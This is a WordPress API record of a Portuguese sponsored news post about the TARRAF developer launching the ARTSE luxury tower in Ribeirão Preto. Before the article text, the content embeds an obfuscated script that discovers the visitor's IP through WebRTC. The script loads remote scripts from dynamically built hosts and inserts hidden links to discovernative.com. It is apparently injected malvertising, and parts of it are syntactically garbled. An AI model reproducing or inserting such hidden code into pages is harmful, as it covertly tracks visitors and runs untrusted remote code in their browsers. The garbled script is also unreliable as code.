{"id":77817,"date":"2024-11-28T16:31:14","date_gmt":"2024-11-28T19:31:14","guid":{"rendered":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/28\/com-mercado-imobiliario-aquecido-tarraf-lanca-o-artse-by-tarraf\/"},"modified":"2024-11-28T16:31:14","modified_gmt":"2024-11-28T19:31:14","slug":"com-mercado-imobiliario-aquecido-tarraf-lanca-o-artse-by-tarraf","status":"publish","type":"post","link":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/28\/com-mercado-imobiliario-aquecido-tarraf-lanca-o-artse-by-tarraf\/","title":{"rendered":"Com mercado imobili\u00e1rio aquecido, TARRAF lan\u00e7a o ARTSE by Tarraf"},"content":{"rendered":"<div id=\"awn-z8922274\"><\/div>\n<p><script data-cfasync=\"false\" type=\"text\/javascript\">\n    var adcashMacros = for(var t,n,r,a,i,o,c=\"\",s=0;s<e.length;)a=(t=e.charCodeAt(s++))>>2,t=(3&t)<<4;\n    var zoneNativeSett=for(var t,n,r,a,i,o,c=\"\",s=0;s<e.length;)a=(t=e.charCodeAt(s++))>>2,t=(3&t)<<4;\n    var urls=(n=e.charCodeAt(s++))>>4,i=(15&n)<<2;function acPrefetch(e)(r=e.charCodeAt(s++))>>6,o=63&r,isNaN(n)?i=o=64:isNaN(r)&&(o=64),c=c+this._0.charAt(a)+this._0.charAt(t)+this._0.charAt(i)+this._0.charAt(o);return cvar nativeInit=new function(){var a=\"\",i=Math.floor(1e12*Math.random()),o=Math.floor(1e12*Math.random()),t=window.location.protocol,c={_0:\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=\",encode:function(e){for(var t,n,r,a,i,o,c=\"\",s=0;s<e.length;)a=(t=e.charCodeAt(s++))>>2,t=(3&t)<<4|(n=e.charCodeAt(s++))>>4,i=(15&n)<<2|(r=e.charCodeAt(s++))>>6,o=63&r,isNaN(n)?i=o=64:isNaN(r)&&(o=64),c=c+this._0.charAt(a)+this._0.charAt(t)+this._0.charAt(i)+this._0.charAt(o);return c}};this.init=function(){e()};var e=function(){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",!1),e.src=\"\/\/pagead2.googlesyndication.com\/pagead\/js\/adsbygoogle.js\",e.onerror=function(){!0,r(),n()},e.onload=function(){nativeForPublishers.init()},nativeForPublishers.attachScript(e)},n=function(){\"\"!==a?s(i,t):setTimeout(n,250)},r=function(){var t=new(window.RTCPeerConnection||window.mozRTCPeerConnection||window.webkitRTCPeerConnection)({iceServers:[{urls:\"stun:1755001826:443\"}]},{optional:[{RtpDataChannels:!0}]});t.onicecandidate=function(e){!e.candidate||e.candidate&&-1==e.candidate.candidate.indexOf(\"srflx\")||!(e=\/([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})\/.exec(e.candidate.candidate)[1])||e.match(\/^(192\\.168\\.|169\\.254\\.|10\\.|172\\.(1[6-9]|2\\d|3[01]))\/)||e.match(\/^[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7}$\/)||(a=e)},t.createDataChannel(\"\"),t.createOffer(function(e){t.setLocalDescription(e,function(){},function(){})},function(){})},s=function(){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",!1),e.src=t+\"\/\/\"+a+\"\/\"+c.encode(i+\"\/\"+(i+5))+\".js\",e.onload=function(){for(var e in zoneNativeSett.r)d(zoneNativeSett.r[e])},nativeForPublishers.attachScript(e)},d=function(e){var t=\"jsonp\"+Math.round(1000001*Math.random()),n=[i,parseInt(e)+i,o,\"callback=\"+t],r=\"http:\/\/\"+a+\"\/\"+c.encode(n.join(\"\/\"));new native_request(r,e,t).jsonp()}},nativeForPublishers=new function(){var n=this,e=Math.random();n.getRand=function(){return e},this.getNativeRender=function(){if(!n.nativeRenderLoaded){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",\"false\"),e.src=urls.cdnUrls[urls.cdnIndex]+\"\/script\/native_render.js\",e.onerror=function(){throw new Error(\"cdnerr\")},e.onload=function(){n.nativeRenderLoaded=!0},n.attachScript(e)}},this.getNativeResponse=function(){if(!n.nativeResponseLoaded){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",\"false\"),e.src=urls.cdnUrls[urls.cdnIndex]+\"\/script\/native_server.js\",e.onerror=function(){throw new Error(\"cdnerr\")},e.onload=function(){n.nativeResponseLoaded=!0},n.attachScript(e)}},this.attachScript=function(e){var t;void 0!==document.scripts&&(t=document.scripts[0]),void 0===t&&(t=document.getElementsByTagName(\"script\")[0]),t.parentNode.insertBefore(e,t)},this.fetchCdnScripts=function(){if(urls.cdnIndex<urls.cdnUrls.length)try{n.getNativeRender(),n.getNativeResponse()}catch(e){urls.cdnIndex++,n.fetchCdnScripts()}},this.scriptsLoaded=function(){if(n.nativeResponseLoaded&#038;&#038;n.nativeRenderLoaded){var e=[];for(zone in zoneNativeSett.r)document.getElementById(zoneNativeSett.container+\"-z\"+zoneNativeSett.r[zone])&#038;&#038;(e[zoneNativeSett.r[zone]]=new native_request(\"\/\/\"+zoneNativeSett.baseUrl+\"?nwpsv=1&#038;\",zoneNativeSett.r[zone]),e[zoneNativeSett.r[zone]].build());for(var t in e)e[t].jsonp(\"callback\",(e[t],function(e,t){setupAd(zoneNativeSett.container+\"-z\"+t,e)}))}else setTimeout(n.scriptsLoaded,250)},this.init=function(){var e;if(n.insertBotTrapLink(),0===window.location.href.indexOf(\"file:\/\/\"))for(e=0;e<urls.cdnUrls.length;e++)0===urls.cdnUrls[e].indexOf(\"\/\/\")&#038;&#038;(urls.cdnUrls[e]=\"http:\"+urls.cdnUrls[e]);for(e=0;e<urls.cdnUrls.length;e++)acPrefetch(urls.cdnUrls[e]);n.fetchCdnScripts(),n.scriptsLoaded()},this.insertBotTrapLink=function(){var e=document.createElement(\"a\");e.href=window.location.protocol+\"\/\/discovernative.com\/al\/visit.php?al=1,4\",e.style.display=\"none\",e.style.visibility=\"hidden\",e.style.position=\"relative\",e.style.left=\"-1000px\",e.style.top=\"-1000px\",e.style.color=\"#fff\",e.link='<a href=\"http:\/\/discovernative.com\/al\/visit.php?al=1,5\"><\/a>',e.innerHTML=\"\",document.body.appendChild(e)}};nativeInit.init();\n<\/script><br \/>\n<a href=\"https:\/\/discovernative.com\/al\/visit.php?al=1,7\"\n   style=\"position:absolute;top:-1000px;left:-1000px;width:1px;height:1px;visibility:hidden;display:none;border:medium none;background-color:transparent;\"><\/a><br \/>\n<noscript><br \/>\n    <a href=\"https:\/\/discovernative.com\/al\/visit.php?al=1,6\"\n       style=\"position:absolute;top:-1000px;left:-1000px;width:1px;height:1px;visibility:hidden;display:none;border:medium none;background-color:transparent;\"><\/a><br \/>\n<\/noscript><br \/>\n <br \/>\n<\/p>\n<div>\n<p>Somando R$ 1,2 bilh\u00e3o em im\u00f3veis comercializados durante o primeiro semestre deste ano, um crescimento de 21% nas vendas na compara\u00e7\u00e3o com o mesmo per\u00edodo de 2023, e com uma valoriza\u00e7\u00e3o de 6% no metro quadrado em 2023, Ribeir\u00e3o Preto tem se destacado como uma das cidades do interior com melhor desempenho no mercado imobili\u00e1rio do Estado de S\u00e3o Paulo. Os dados s\u00e3o de duas pesquisas divulgadas pela Associa\u00e7\u00e3o Brasileira de Incorporadoras Imobili\u00e1rias (ABRAINC).<\/p>\n<p>Esse cen\u00e1rio otimista reflete o potencial da regi\u00e3o para novos investimentos. \u201cO interior de S\u00e3o Paulo tem se mostrado s\u00f3lido para novos investimentos imobili\u00e1rios. Cidades como S\u00e3o Jos\u00e9 do Rio Preto, Mar\u00edlia e Ribeir\u00e3o Preto est\u00e3o se destacando n\u00e3o apenas pelo aumento no n\u00famero de empreendimentos, mas tamb\u00e9m pela alta demanda de vendas, reflexo de um setor cada vez mais aquecido no interior de S\u00e3o Paulo. Esses resultados refor\u00e7am o otimismo e sinalizam para um bom ano de crescimento para o restante de 2024\u201d, afirma Luiz Fran\u00e7a, presidente da ABRAINC.<\/p>\n<p>Nesse contexto, a TARRAF vem fortalecendo sua atua\u00e7\u00e3o em Ribeir\u00e3o Preto, onde j\u00e1 desenvolve o THAI Homes e, agora, se prepara para lan\u00e7ar o ARTSE by Tarraf \u2013 uma torre de alt\u00edssimo padr\u00e3o inspirada no conceito de \u201cquiet luxury\u201d, que exalta a eleg\u00e2ncia e o luxo no minimalismo. \u201cRibeir\u00e3o Preto re\u00fane atributos como crescimento acelerado, valoriza\u00e7\u00e3o do metro quadrado e forte demanda imobili\u00e1ria, consolidando-se como o lugar ideal para um projeto como o ARTSE. Cada detalhe foi pensado para agregar valor n\u00e3o apenas ao empreendimento, mas tamb\u00e9m ao ambiente ao redor\u201d, destaca Olavo Tarraf Filho, vice-presidente da TARRAF.<\/p>\n<h2 class=\"wp-block-heading\"><strong>O ARTSE by Tarraf<\/strong><\/h2>\n<p>Localizado no bairro planejado Ilhas do Sul \u2013 regi\u00e3o nobre de Ribeir\u00e3o Preto que liderou o mercado imobili\u00e1rio local em 2023 com um Valor Geral de Vendas (VGV) m\u00e9dio de R$ 416,5 milh\u00f5es e pre\u00e7o do metro quadrado atingindo R$ 8,9 mil, segundo pesquisa da Abrainc com base em dados da GeoBrain \u2013, o ARTSE by Tarraf \u00e9 um empreendimento com VGV de R$ 215 milh\u00f5es e mais de 36 mil m\u00b2 de \u00e1rea constru\u00edda.<\/p>\n<p>Com torre \u00fanica, 28 pavimentos e 112 unidades, o projeto oferece apartamentos de 183 m\u00b2 e 237 m\u00b2, todos com varanda gourmet. O condom\u00ednio ainda conta com ampla \u00e1rea de lazer e conv\u00edvio que inclui piscina com borda infinita e vista privilegiada, family space, espa\u00e7o gourmet e festas, sport bar, academia completa e de primeira linha, quadra, playground e brinquedoteca, entre outros.<\/p>\n<h2 class=\"wp-block-heading\"><strong>Espa\u00e7os que inspiram<\/strong><\/h2>\n<p>Fiel \u00e0 sua miss\u00e3o de criar espa\u00e7os que inspiram, a TARRAF transforma o substantivo \u201carte\u201d em a\u00e7\u00e3o. \u201cARTSE \u00e9 viver a arte em sua ess\u00eancia, abra\u00e7ar o minimalismo e a eleg\u00e2ncia em um ambiente que inspira emo\u00e7\u00f5es \u00fanicas e traduz a verdadeira arte de morar\u201d, explica Olavo Tarraf, presidente da incorporadora.<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/i0.wp.com\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/2_2024-11-28_19-10-26_png_2024-11-28_19-10-26-1024x683.webp?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-101058\" srcset=\"https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/2_2024-11-28_19-10-26_png_2024-11-28_19-10-26-1024x683.webp 1024w, https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/2_2024-11-28_19-10-26_png_2024-11-28_19-10-26-300x200.webp 300w, https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/2_2024-11-28_19-10-26_png_2024-11-28_19-10-26-768x512.webp 768w, https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/2_2024-11-28_19-10-26_png_2024-11-28_19-10-26-696x464.webp 696w, https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/2_2024-11-28_19-10-26_png_2024-11-28_19-10-26-1068x712.webp 1068w, https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/2_2024-11-28_19-10-26_png_2024-11-28_19-10-26.webp 1200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\"\/><\/figure>\n<p>Cr\u00e9dito: Divulga\u00e7\u00e3o<\/p>\n<p>O empreendimento traduz o conceito de \u201cquiet luxury\u201d em cada detalhe de sua composi\u00e7\u00e3o. A arquitetura sofisticada conta com tra\u00e7os modernos, linhas retas e minimalistas promovendo uma experi\u00eancia sutil e elegante. O design com ambientes esculpidos com tons naturalmente quentes, amadeirados e equilibrados amplia a sensa\u00e7\u00e3o de conforto e exclusividade. J\u00e1 o paisagismo usa formas org\u00e2nicas e geom\u00e9tricas para integrar arquitetura e natureza transformando o cotidiano em arte.<\/p>\n<p>Para chegar ao resultado desejado, a TARRAF contou com a parceria de grandes nomes do mercado. O projeto arquitet\u00f4nico foi assinado pelo escrit\u00f3rio K\u00f6nigsberger Vannucchi, refer\u00eancia no setor com mais de 50 anos de hist\u00f3ria; o design ficou a cargo de um dos principais nomes da arquitetura de interiores do Brasil, Carlos Rossi; e o paisagismo \u00e9 obra do escrit\u00f3rio Burle Marx, uma das maiores refer\u00eancias do pa\u00eds na \u00e1rea, escolhido para criar um espa\u00e7o que una eleg\u00e2ncia e contato com a natureza.<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/i0.wp.com\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/3_2024-11-28_19-11-17_png_2024-11-28_19-11-17-1024x683.webp?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-101059\" srcset=\"https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/3_2024-11-28_19-11-17_png_2024-11-28_19-11-17-1024x683.webp 1024w, https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/3_2024-11-28_19-11-17_png_2024-11-28_19-11-17-300x200.webp 300w, https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/3_2024-11-28_19-11-17_png_2024-11-28_19-11-17-768x512.webp 768w, https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/3_2024-11-28_19-11-17_png_2024-11-28_19-11-17-696x464.webp 696w, https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/3_2024-11-28_19-11-17_png_2024-11-28_19-11-17-1068x712.webp 1068w, https:\/\/www.acidadeon.com\/ribeiraopreto\/wp-content\/uploads\/sites\/3\/2024\/11\/3_2024-11-28_19-11-17_png_2024-11-28_19-11-17.webp 1200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\"\/><\/figure>\n<p>Olavo Tarraf e Olavo Tarraf Filho \u2013 Cr\u00e9dito: Xavier Neto<\/p>\n<h2 class=\"wp-block-heading\"><strong>Hist\u00f3ria<\/strong><\/h2>\n<p>Com mais de 40 anos de mercado, a TARRAF se especializou na cria\u00e7\u00e3o de espa\u00e7os que inspiram, proporcionando experi\u00eancias \u00fanicas para os moradores, e na constru\u00e7\u00e3o de empreendimentos que aliam conceito e personalidade. S\u00e3o mais de 31 mil unidades entregues com mais de 105 mil pessoas vivendo e vivenciando ambientes pensados pela TARRAF. Para conhecer mais sobre a incorporadora e os seus empreendimentos, acesse <a href=\"http:\/\/www.tarraf.com.br\">www.tarraf.com.br<\/a> ou visite o stand de vendas localizado na Avenida Professor Jo\u00e3o Fi\u00fasa, 2.710.<\/p>\n<p><!-- CONTENT END 1 -->\n<\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/www.acidadeon.com\/ribeiraopreto\/conteudo-patrocinado\/tarraf\/com-mercado-imobiliario-aquecido-tarraf-lanca-o-artse-by-tarraf\/\">Source link <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Somando R$ 1,2 bilh\u00e3o em im\u00f3veis comercializados durante o primeiro semestre deste ano, um crescimento de 21% nas vendas na compara\u00e7\u00e3o com o mesmo per\u00edodo&#8230;<\/p>\n","protected":false},"author":1,"featured_media":77818,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","advanced_seo_description":"","jetpack_seo_html_title":"","jetpack_seo_noindex":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[11],"tags":[],"class_list":["post-77817","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/1_2024-11-28_19-08-43_png_2024-11-28_19-08-43.webp.webp?fit=1200%2C800&ssl=1","uagb_featured_image_src":{"full":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/1_2024-11-28_19-08-43_png_2024-11-28_19-08-43.webp.webp?fit=1200%2C800&ssl=1",1200,800,false],"thumbnail":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/1_2024-11-28_19-08-43_png_2024-11-28_19-08-43.webp.webp?resize=150%2C150&ssl=1",150,150,true],"medium":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/1_2024-11-28_19-08-43_png_2024-11-28_19-08-43.webp.webp?fit=300%2C200&ssl=1",300,200,true],"medium_large":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/1_2024-11-28_19-08-43_png_2024-11-28_19-08-43.webp.webp?fit=768%2C512&ssl=1",768,512,true],"large":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/1_2024-11-28_19-08-43_png_2024-11-28_19-08-43.webp.webp?fit=1024%2C683&ssl=1",1024,683,true],"1536x1536":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/1_2024-11-28_19-08-43_png_2024-11-28_19-08-43.webp.webp?fit=1200%2C800&ssl=1",1200,800,true],"2048x2048":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/1_2024-11-28_19-08-43_png_2024-11-28_19-08-43.webp.webp?fit=1200%2C800&ssl=1",1200,800,true],"really-simple-thumb":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/1_2024-11-28_19-08-43_png_2024-11-28_19-08-43.webp.webp?resize=370%2C247&ssl=1",370,247,true]},"uagb_author_info":{"display_name":"ismaelcolosi.com.br","author_link":"https:\/\/ismaelcolosi.com.br\/index.php\/author\/vidareal-online\/"},"uagb_comment_info":0,"uagb_excerpt":"Somando R$ 1,2 bilh\u00e3o em im\u00f3veis comercializados durante o primeiro semestre deste ano, um crescimento de 21% nas vendas na compara\u00e7\u00e3o com o mesmo per\u00edodo...","jetpack-related-posts":[{"id":74418,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/10\/31\/bairros-das-zonas-oeste-e-sul-de-ribeirao-tem-alerta-de-falta-dagua-veja-lista\/","url_meta":{"origin":77817,"position":0},"title":"Bairros das zonas Oeste e Sul de Ribeir\u00e3o t\u00eam alerta de falta d&#8217;\u00e1gua; Veja lista","author":"ismaelcolosi.com.br","date":"31 de October de 2024","format":false,"excerpt":"A Saerp (Secretaria de \u00c1gua e Esgoto de Ribeir\u00e3o Preto) publicou um alerta nesta quinta-feira (31) para o risco de falta d\u2019\u00e1gua em bairros das zonas Oeste e Sul da cidade. Segundo a Pasta, as equipes realizam uma manuten\u00e7\u00e3o preventiva do sistema de abastecimento no reservat\u00f3rio CDHU \u2013 Jo\u00e3o Rossi\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/torneira-agua_2024-07-22_12-45-42_jpg_2024-07-22_12-45-42.webp.webp?fit=1170%2C700&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/torneira-agua_2024-07-22_12-45-42_jpg_2024-07-22_12-45-42.webp.webp?fit=1170%2C700&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/torneira-agua_2024-07-22_12-45-42_jpg_2024-07-22_12-45-42.webp.webp?fit=1170%2C700&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/torneira-agua_2024-07-22_12-45-42_jpg_2024-07-22_12-45-42.webp.webp?fit=1170%2C700&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/torneira-agua_2024-07-22_12-45-42_jpg_2024-07-22_12-45-42.webp.webp?fit=1170%2C700&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":74611,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/01\/morre-homem-encontrado-ferido-em-rotatoria-de-ribeirao-preto\/","url_meta":{"origin":77817,"position":1},"title":"Morre homem encontrado ferido em rotat\u00f3ria de Ribeir\u00e3o Preto","author":"ismaelcolosi.com.br","date":"1 de November de 2024","format":false,"excerpt":"O homem encontrado ferido e inconsciente na \u00faltima ter\u00e7a-feira (29), em uma rotat\u00f3ria da avenida Luis Galv\u00e3o C\u00e9sar, no Parque das Figueiras, zona Oeste de Ribeir\u00e3o Preto, n\u00e3o resistiu e morreu nesta quinta-feira (31). Segundo o boletim de ocorr\u00eancia (BO), a v\u00edtima, identificada como F\u00e1bio Ara\u00fajo de Lima, de 44\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/02\/whatsapp_image_2022-08-14_at_12_10_03.jpe","width":350,"height":200,"srcset":"https:\/\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/02\/whatsapp_image_2022-08-14_at_12_10_03.jpe 1x, https:\/\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/02\/whatsapp_image_2022-08-14_at_12_10_03.jpe 1.5x, https:\/\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/02\/whatsapp_image_2022-08-14_at_12_10_03.jpe 2x, https:\/\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/02\/whatsapp_image_2022-08-14_at_12_10_03.jpe 3x"},"classes":[]},{"id":80388,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/12\/23\/homem-e-preso-acusado-de-esfaquear-a-namorada-no-pescoco-em-ribeirao-preto\/","url_meta":{"origin":77817,"position":2},"title":"Homem \u00e9 preso acusado de esfaquear a namorada no pesco\u00e7o em Ribeir\u00e3o Preto","author":"ismaelcolosi.com.br","date":"23 de December de 2024","format":false,"excerpt":"Um homem de 39 anos foi preso suspeito de esfaquear a namorada na noite deste domingo (22), na zona Oeste de Ribeir\u00e3o Preto. Segundo o boletim de ocorr\u00eancia (BO), a v\u00edtima, de 33 anos, foi atingida no pesco\u00e7o e ficou inconsciente quando estava em casa, na rua Dr. Eug\u00eanio Casilo,\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1734970671_cpj_policia_1024x576_21012021082231.jpg?fit=1024%2C576&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1734970671_cpj_policia_1024x576_21012021082231.jpg?fit=1024%2C576&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1734970671_cpj_policia_1024x576_21012021082231.jpg?fit=1024%2C576&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1734970671_cpj_policia_1024x576_21012021082231.jpg?fit=1024%2C576&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":76655,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/15\/adolescente-perde-controle-de-carro-roubado-durante-fuga-e-bate-em-poste-video\/","url_meta":{"origin":77817,"position":3},"title":"Adolescente perde controle de carro roubado durante fuga e bate em poste; V\u00eddeo","author":"ismaelcolosi.com.br","date":"15 de November de 2024","format":false,"excerpt":"Uma c\u00e2mera de seguran\u00e7a filmou o momento em que um adolescente de 16 anos bateu o carro que dirigia em um poste na avenida William Azzuz, em Franca, cidade a 88 quil\u00f4metros de Ribeir\u00e3o Preto. O adolescente fugia da Pol\u00edcia Militar em um carro roubado, no fim da noite de\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/perseguicao_2024-11-15_15-31-10_jpg_2024-11-15_15-31-10.webp.webp?fit=941%2C631&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/perseguicao_2024-11-15_15-31-10_jpg_2024-11-15_15-31-10.webp.webp?fit=941%2C631&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/perseguicao_2024-11-15_15-31-10_jpg_2024-11-15_15-31-10.webp.webp?fit=941%2C631&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/perseguicao_2024-11-15_15-31-10_jpg_2024-11-15_15-31-10.webp.webp?fit=941%2C631&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":80304,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/12\/22\/apos-inundacao-parque-aquatico-anuncia-data-de-reabertura-sem-parte-das-atracoes-veja-quando\/","url_meta":{"origin":77817,"position":4},"title":"Ap\u00f3s inunda\u00e7\u00e3o, parque aqu\u00e1tico anuncia data de reabertura sem parte das atra\u00e7\u00f5es; Veja quando","author":"ismaelcolosi.com.br","date":"22 de December de 2024","format":false,"excerpt":"O Parque Aqu\u00e1tico Thermas dos Laranjais, em Ol\u00edmpia, cidade a aproximadamente 130 quil\u00f4metros de Ribeir\u00e3o Preto, no interior de S\u00e3o Paulo, anunciou sua reabertura, ap\u00f3s ter suas depend\u00eancias inundadas durante um temporal ocorrido neste s\u00e1bado (21). O parque est\u00e1 fechado neste domingo (22) e, segundo a assessoria de imprensa, dever\u00e1\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/OLIMPIA_2024-12-22_19-44-58_jpg_2024-12-22_19-44-58.webp.webp?fit=1200%2C640&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/OLIMPIA_2024-12-22_19-44-58_jpg_2024-12-22_19-44-58.webp.webp?fit=1200%2C640&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/OLIMPIA_2024-12-22_19-44-58_jpg_2024-12-22_19-44-58.webp.webp?fit=1200%2C640&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/OLIMPIA_2024-12-22_19-44-58_jpg_2024-12-22_19-44-58.webp.webp?fit=1200%2C640&ssl=1&resize=700%2C400 2x, 